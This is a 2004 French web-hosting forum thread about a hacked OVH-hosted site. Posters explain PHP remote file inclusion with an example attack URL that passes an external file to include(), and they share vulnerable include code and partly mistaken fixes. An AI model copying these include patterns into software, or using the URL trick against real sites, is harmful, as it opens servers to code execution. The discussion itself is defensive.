Forum |  HardWare.fr | News | Articles | PC | S'identifier | S'inscrire | Shop Recherche
2210 connectés 

  FORUM HardWare.fr
  Windows & Software

  Attaques à répétition chez Ovh ???

 


 Mot :   Pseudo :  
 
Bas de page
Auteur Sujet :

Attaques à répétition chez Ovh ???

n°1552140
dexenium
Posté le 03-05-2004 à 19:18:46  profilanswer
 

Bonjour,
 
J'ai un site hébergé chez Ovh et nous avons été hacké coup sur coup en deux semaines.
 
Quelqu'un a-t-il des infos à ce sujet ?
Nous en avons marre d'être régulièrement indisponibles (quand on a un site marchand et de petits moyens).
Il serait souhaitable que Ovh héberge moins de site mais fournisse plus de sécurité qu'en pensez-vous ???
Merci pour vos infos,
Christophe
 

mood
Publicité
Posté le 03-05-2004 à 19:18:46  profilanswer
 

n°1552169
chaced
Posté le 03-05-2004 à 19:30:15  profilanswer
 

Dexenium a écrit :

Bonjour,
 
J'ai un site hébergé chez Ovh et nous avons été hacké coup sur coup en deux semaines.
 
Quelqu'un a-t-il des infos à ce sujet ?
Nous en avons marre d'être régulièrement indisponibles (quand on a un site marchand et de petits moyens).
Il serait souhaitable que Ovh héberge moins de site mais fournisse plus de sécurité qu'en pensez-vous ???
Merci pour vos infos,
Christophe


 
En mutualisé ou en dédié ?
 
Tu es sur que ce n'est pas un trou de sécuritée sur ton site ?


---------------
CPU-Z | Timespy | Mes bd | Mon blog
n°1552199
dexenium
Posté le 03-05-2004 à 19:44:25  profilanswer
 

On est en mutualisé sur un 720
On a changé tous les mots de passe du ftp et "toutiquanti" mais le hack est différent à chaque fois
 
Il semble que les hackers passent par telnet (on a trouvé des fichiers compilés) et il y avait un virus dédié à Unix donc fait pour attaquer le serveur.
Le site fonctionne avec des scripts.cgi un truc qu'aiment bien les hackers parait-il...
Mais bon le réactivité d'Ovh c'est toujours pas ça !!! Dommagrien a dire pour le reste.
A+

n°1552204
chaced
Posté le 03-05-2004 à 19:47:44  profilanswer
 

Dexenium a écrit :

On est en mutualisé sur un 720
On a changé tous les mots de passe du ftp et "toutiquanti" mais le hack est différent à chaque fois
 
Il semble que les hackers passent par telnet (on a trouvé des fichiers compilés) et il y avait un virus dédié à Unix donc fait pour attaquer le serveur.
Le site fonctionne avec des scripts.cgi un truc qu'aiment bien les hackers parait-il...
Mais bon le réactivité d'Ovh c'est toujours pas ça !!! Dommagrien a dire pour le reste.
A+


 
J'ai un collegue qui a eu ce genre de probleme sur un mutualisée 60gp, il s'avéré que c'était un troue de sécuritée sur son forum (D-Forum) et un simple ini_set("allow_url_fopen","off" ); a résollu le probleme :D


---------------
CPU-Z | Timespy | Mes bd | Mon blog
n°1552233
dexenium
Posté le 03-05-2004 à 19:58:41  profilanswer
 

Merci  
Nous avons phpbb on peut toujours jeter un oeil mais à priori je n'ai pas eu d'infos sur un problème de ce type sur phpbb
 
Christophe
 
 

n°1552251
chaced
Posté le 03-05-2004 à 20:08:53  profilanswer
 

Dexenium a écrit :

Merci  
Nous avons phpbb on peut toujours jeter un oeil mais à priori je n'ai pas eu d'infos sur un problème de ce type sur phpbb
 
Christophe


 
Sur D-Forum, c'etait une erreur classique,
 
en haut de la page, il y avait un appel a une variable du genre
 
include($toto);
 
le probleme, il suffisait de passer  
index.php?toto=http://monfichieramoi.php
 
bref, il y a tout plein de trucs comme ça, et le pire, c'est php nuke :(


---------------
CPU-Z | Timespy | Mes bd | Mon blog
n°1552265
dexenium
Posté le 03-05-2004 à 20:16:46  profilanswer
 

Je veux bien mais là c'est une attaque ciblée non ? Sur un site (un concurrent alors ???)

n°1552271
chaced
Posté le 03-05-2004 à 20:18:29  profilanswer
 

Dexenium a écrit :

Je veux bien mais là c'est une attaque ciblée non ? Sur un site (un concurrent alors ???)


 
Il fait quoi le hack ? changement de certaine pages ?  
 
sinon il tourne sous quoi votre site, OS Commerce ?


---------------
CPU-Z | Timespy | Mes bd | Mon blog
n°1552288
dexenium
Posté le 03-05-2004 à 20:26:04  profilanswer
 

En fait la première fois l'index.htm a été changé en index.html du hacker + tous les fichiers .pl ont été effacés
 
Cette fois ci il y avait plein de dossier sur le ftp avec pandora6666 et du dossier nommé sk avec dedans des fichiers de config ds fichiers source... Là actuellement je n'ai plus accès à l'index.cgi j'ai ce message sur toutes les pages :
Forbidden
You don't have permission to access / on this server.
 
 
--------------------------------------------------------------------------------
 
Apache/1.3.29 Server at www.#########.com Port 80
 
C'est le serveur qui est down, non ?

n°1552290
dexenium
Posté le 03-05-2004 à 20:26:55  profilanswer
 

Oups en fait le site il tourne pas avec Os commerce c'est des scripts cgi ou des pages en perl

mood
Publicité
Posté le 03-05-2004 à 20:26:55  profilanswer
 

n°1552293
chaced
Posté le 03-05-2004 à 20:28:24  profilanswer
 

vu ce que tu dits, c'est clair que c'est une faille de sécuritée dans un script perl :(


---------------
CPU-Z | Timespy | Mes bd | Mon blog
n°1552710
cybervince
It's all good man
Posté le 04-05-2004 à 01:40:41  profilanswer
 

Wai je pense aussi que ca provienne de ton script.


---------------
SaulGoodman.fr: Actus sur la série Better Call Saul
n°1553672
disconect
Posté le 04-05-2004 à 16:10:30  profilanswer
 

chaced a écrit :

Sur D-Forum, c'etait une erreur classique,
 
en haut de la page, il y avait un appel a une variable du genre
 
include($toto);
 
le probleme, il suffisait de passer  
index.php?toto=http://monfichieramoi.php
 
bref, il y a tout plein de trucs comme ça, et le pire, c'est php nuke :(

d'ailleurs, j'utilise une structure comme ça pour mon site....hmm... [:twixy] ....comment on peut faire pour que ce soit invisible ?
j'ai un nom de domaine, un hebergement "pro" (60GP chez OVH).

n°1553722
chaced
Posté le 04-05-2004 à 16:47:44  profilanswer
 

disconect a écrit :

d'ailleurs, j'utilise une structure comme ça pour mon site....hmm... [:twixy] ....comment on peut faire pour que ce soit invisible ?
j'ai un nom de domaine, un hebergement "pro" (60GP chez OVH).


 
Empeche l'appel externe a un fichier hors du serveur avec
 
ini_set("allow_url_fopen","off" );


---------------
CPU-Z | Timespy | Mes bd | Mon blog
n°1553774
cybervince
It's all good man
Posté le 04-05-2004 à 17:14:49  profilanswer
 

chaced a écrit :

Empeche l'appel externe a un fichier hors du serveur avec
 
ini_set("allow_url_fopen","off" );


C'est à mettre dans quel fichier ce paramètre dans le cas d'un 60gp ?


---------------
SaulGoodman.fr: Actus sur la série Better Call Saul
n°1553782
chaced
Posté le 04-05-2004 à 17:17:26  profilanswer
 

cybervince a écrit :

C'est à mettre dans quel fichier ce paramètre dans le cas d'un 60gp ?


 
dans tout tes fichiers php, donc plutot dans un qui est appelé chaque fois comme un config.inc.php par exemple ;)


---------------
CPU-Z | Timespy | Mes bd | Mon blog
n°1553789
disconect
Posté le 04-05-2004 à 17:18:36  profilanswer
 

chaced a écrit :

Empeche l'appel externe a un fichier hors du serveur avec
 
ini_set("allow_url_fopen","off" );

:jap:

n°1553830
cybervince
It's all good man
Posté le 04-05-2004 à 17:36:30  profilanswer
 

chaced a écrit :

dans tout tes fichiers php, donc plutot dans un qui est appelé chaque fois comme un config.inc.php par exemple ;)


Ok merci, jpensai que c'était un truc qu'on ne pouvais spécifier qu'au niveau du php.ini
A ce propos, peut-on sur des hébergement tel qu'OVH en mutualisé modifier ce genre de propriétés du php.ini afin qu'elles soient changées sur tout un répertoire (comme pour les .htaccess).
Car ca serait nettement plus simple de changer la propriété une bonne fois pour toute.


---------------
SaulGoodman.fr: Actus sur la série Better Call Saul
n°1553849
disconect
Posté le 04-05-2004 à 17:43:53  profilanswer
 

heu je viens d'essayer...ça n'a pas vraiment l'air de fonctionner  :heink:  
 
j'ai insére le code dans l'index.php là ou y a le code include :

<?php  
 
$url=$HTTP_GET_VARS["u"];
ini_set("allow_url_fopen","off" );  
if ($url!="" ) {include($url.".php" );}
 else include("default.php" ); ?>

n°1553867
chaced
Posté le 04-05-2004 à 17:52:34  profilanswer
 

disconect a écrit :

heu je viens d'essayer...ça n'a pas vraiment l'air de fonctionner  :heink:  
 
j'ai insére le code dans l'index.php là ou y a le code include :

<?php  
 
$url=$HTTP_GET_VARS["u"];
ini_set("allow_url_fopen","off" );  
if ($url!="" ) {include($url.".php" );}
 else include("default.php" ); ?>




 
bien sur, ça n'empeche pas ton include de fonctionner, normallement il doit interdire l'appel vers une url exterieure.
 
De toute façon, meme si ça bloque l'exterieur, il est fortement déconseiller d'utiliser un include de ce genre car, on peut arriver a sortir différents ellements.
 
en plus chez ovh, il suffit de faire
$url = $u :D


---------------
CPU-Z | Timespy | Mes bd | Mon blog
n°1553873
disconect
Posté le 04-05-2004 à 17:56:00  profilanswer
 

chaced a écrit :

bien sur, ça n'empeche pas ton include de fonctionner, normallement il doit interdire l'appel vers une url exterieure.
 
De toute façon, meme si ça bloque l'exterieur, il est fortement déconseiller d'utiliser un include de ce genre car, on peut arriver a sortir différents ellements.
 
en plus chez ovh, il suffit de faire
$url = $u :D

bah....non, j'arrive à appeler un fichier situé chez un serveur free.fr , c'est pour ça que je dis que ça ne fonctionne po :/
 
[HS]
Pour recuperer, les variables, m'en fout que ovh permette de faire $url = $u , je prend la methode "extract" now :o (cf. www.phpdebutant.com) mais bon on s'eloigne du sujet :D
[/HS]

n°1553882
cybervince
It's all good man
Posté le 04-05-2004 à 17:59:40  profilanswer
 


C'est parce que le REGISTER_GLOBALS est à On ?
Où alors il y a une autre raison ? Car si il y en a une autre, j'ai pas tout compris.


---------------
SaulGoodman.fr: Actus sur la série Better Call Saul
n°1553897
chaced
Posté le 04-05-2004 à 18:00:19  profilanswer
 

disconect a écrit :

bah....non, j'arrive à appeler un fichier situé chez un serveur free.fr , c'est pour ça que je dis que ça ne fonctionne po :/
 
[HS]
Pour recuperer, les variables, m'en fout que ovh permette de faire $url = $u , je prend la methode "extract" now :o (cf. www.phpdebutant.com) mais bon on s'eloigne du sujet :D
[/HS]


 
Donc si tu prends la methode extract pour eviter les trous de securitée, n'appele pas une variable avec include :D
 
tu peux tres bien faire ça :
if ($u=="1" ) {include_once("tutu1.php" );}
else {{include_once("tutu2.php" );}}


---------------
CPU-Z | Timespy | Mes bd | Mon blog
n°1553907
cybervince
It's all good man
Posté le 04-05-2004 à 18:04:41  profilanswer
 

Perso sur mon site à un moment je fesais un include d'un fichier que je passe en paramètre, mais pour éviter qu'on puisse passer n'importe quoi, les fichiers que je permet d'inclure je les mets dans un répertoire que où il n'y a que ces fichiers, et le répertoire est forcé dans le code source.
Ca donne un truc du genre:
 

Code :
  1. include("rep_include/".$_GET['fichier']);


 
Dans mon cas c'est juste pour permettre d'inclure des fichiers html.
Est-ce que ca peut présenter un risque ?


Message édité par cybervince le 04-05-2004 à 18:05:10

---------------
SaulGoodman.fr: Actus sur la série Better Call Saul
n°1553910
disconect
Posté le 04-05-2004 à 18:05:59  profilanswer
 

chaced a écrit :

Donc si tu prends la methode extract pour eviter les trous de securitée, n'appele pas une variable avec include :D
 
tu peux tres bien faire ça :
if ($u=="1" ) {include_once("tutu1.php" );}
else {{include_once("tutu2.php" );}}

ouais c'est ce que je pensais, à la limite je pourrais faire un case/switch avec différents n° correspondant à différentes pages...mais je croyais que la methode que t'avais donnée m'eviterais de réfl...heu de re-coder ça :D

n°1553912
chaced
Posté le 04-05-2004 à 18:06:43  profilanswer
 

cybervince a écrit :

Perso sur mon site à un moment je fesais un include d'un fichier que je passe en paramètre, mais pour éviter qu'on puisse passer n'importe quoi, les fichiers que je permet d'inclure je les mets dans un répertoire que où il n'y a que ces fichiers, et le répertoire est forcé dans le code source.
Ca donne un truc du genre:
 

Code :
  1. include("rep_include/".$_GET['fichier']);


 
Dans mon cas c'est juste pour permettre d'inclure des fichiers html.
Est-ce que ca peut présenter un risque ?


 
sinon, j'y penses, un petit parseur qui controlle l'absence du http://


---------------
CPU-Z | Timespy | Mes bd | Mon blog
n°1553930
chaced
Posté le 04-05-2004 à 18:14:56  profilanswer
 

une bonne aide : http://thierrylhomme.developpez.com/php/php_secure/
 
le truc de base, désactiver les erreurs


---------------
CPU-Z | Timespy | Mes bd | Mon blog
n°1553941
disconect
Posté le 04-05-2004 à 18:25:08  profilanswer
 

chaced a écrit :

une bonne aide : http://thierrylhomme.developpez.com/php/php_secure/
 
le truc de base, désactiver les erreurs

thx.
 
alors là, j'ai rien touché (même pas de re-upload sur ovh), je re-essaye et en effet il ne prend plus les fichiers en dehors du site :)
nikel  :jap:

n°1553945
chaced
Posté le 04-05-2004 à 18:26:38  profilanswer
 

disconect a écrit :

ouais c'est ce que je pensais, à la limite je pourrais faire un case/switch avec différents n° correspondant à différentes pages...mais je croyais que la methode que t'avais donnée m'eviterais de réfl...heu de re-coder ça :D


 
tu es sur d'avoir bien testé ?  
 
je viens de mettre un test.php chez ovh qui contient :
 

Code :
  1. <?
  2. ini_set("allow_url_fopen","off" );
  3. @include($toto) OR die ("Petit con va" );
  4. ?>


 
et un test2.php chez free qui contient :

Code :
  1. <?
  2. echo "bonjour";
  3. ?>


 
et en fesant :  
http://www.chaced.com/test.php?tot [...] /test2.php
 
le bonjour ne s'affiche pas, donc mon truc fonctionne.


---------------
CPU-Z | Timespy | Mes bd | Mon blog
n°1553949
chaced
Posté le 04-05-2004 à 18:28:46  profilanswer
 

disconect a écrit :

thx.
 
alors là, j'ai rien touché (même pas de re-upload sur ovh), je re-essaye et en effet il ne prend plus les fichiers en dehors du site :)
nikel  :jap:


 
bon cool, mon truc marche :D
 
j'ai aussi ça :
if (!$DEBUG) {ini_set("display-errors","off" );}


---------------
CPU-Z | Timespy | Mes bd | Mon blog
n°1554000
disconect
Posté le 04-05-2004 à 19:00:04  profilanswer
 

chaced a écrit :

bon cool, mon truc marche :D
 
j'ai aussi ça :
if (!$DEBUG) {ini_set("display-errors","off" );}

heu...désolé, mais suis débile, m'etais trompé dans l'url la deuxiéme fois :o, marche po ton truc :o  [:ddr555]

n°1554002
chaced
Posté le 04-05-2004 à 19:01:18  profilanswer
 

disconect a écrit :

heu...désolé, mais suis débile, m'etais trompé dans l'url la deuxiéme fois :o, marche po ton truc :o  [:ddr555]


 
pourtant avec le teste que j'ai mi dessus, ça fonctionne tres bien


---------------
CPU-Z | Timespy | Mes bd | Mon blog
n°1554062
disconect
Posté le 04-05-2004 à 19:40:14  profilanswer
 

heu...ça marche pas ton truc, j'arrive pas à faire afficher toto2.php tout seul.

n°1554073
chaced
Posté le 04-05-2004 à 19:46:56  profilanswer
 

disconect a écrit :

heu...ça marche pas ton truc, j'arrive pas à faire afficher toto2.php tout seul.


 
ou tu vois un toto 2 .php ?
 
http://chaced.free.fr/test2.php


---------------
CPU-Z | Timespy | Mes bd | Mon blog
n°1554118
disconect
Posté le 04-05-2004 à 20:12:55  profilanswer
 

heu...fin de journée sorry [:dawa]
 
bah alors je comprend pas du tt pqoi ça ne marche pas chez moi en fait :/

n°1554706
dexenium
Posté le 05-05-2004 à 10:58:45  profilanswer
 

Les gars !
Moi mon truc il tourne avec un script .cgi c'est valable tout ça ?

n°1554707
chaced
Posté le 05-05-2004 à 10:59:55  profilanswer
 

Dexenium a écrit :

Les gars !
Moi mon truc il tourne avec un script .cgi c'est valable tout ça ?


 
Désolé, je ne connais pas les sites fait en perl...


---------------
CPU-Z | Timespy | Mes bd | Mon blog
n°1555317
dexenium
Posté le 05-05-2004 à 16:22:55  profilanswer
 

Merci quand même :))

mood
Publicité
Posté le   profilanswer
 


Aller à :
Ajouter une réponse
  FORUM HardWare.fr
  Windows & Software

  Attaques à répétition chez Ovh ???

 

Sujets relatifs
Détérioration du système d'exploitation apres infection a répétition ?Qualité des serveurs OVH ?
serveur pop perso chez ovhMusique MP3 corrompue : répétition des 3 premières secondes
Identifiant OVH chez GandiOVH Down?
OVH et site : gros soucis urgent !OVH , jexiste ou 1&1 ?
service affichage a repetitionOVH : Je ne comprends pas leur politique commerciale
Plus de sujets relatifs à : Attaques à répétition chez Ovh ???


Copyright © 1997-2025 Groupe LDLC (Signaler un contenu illicite / Données personnelles)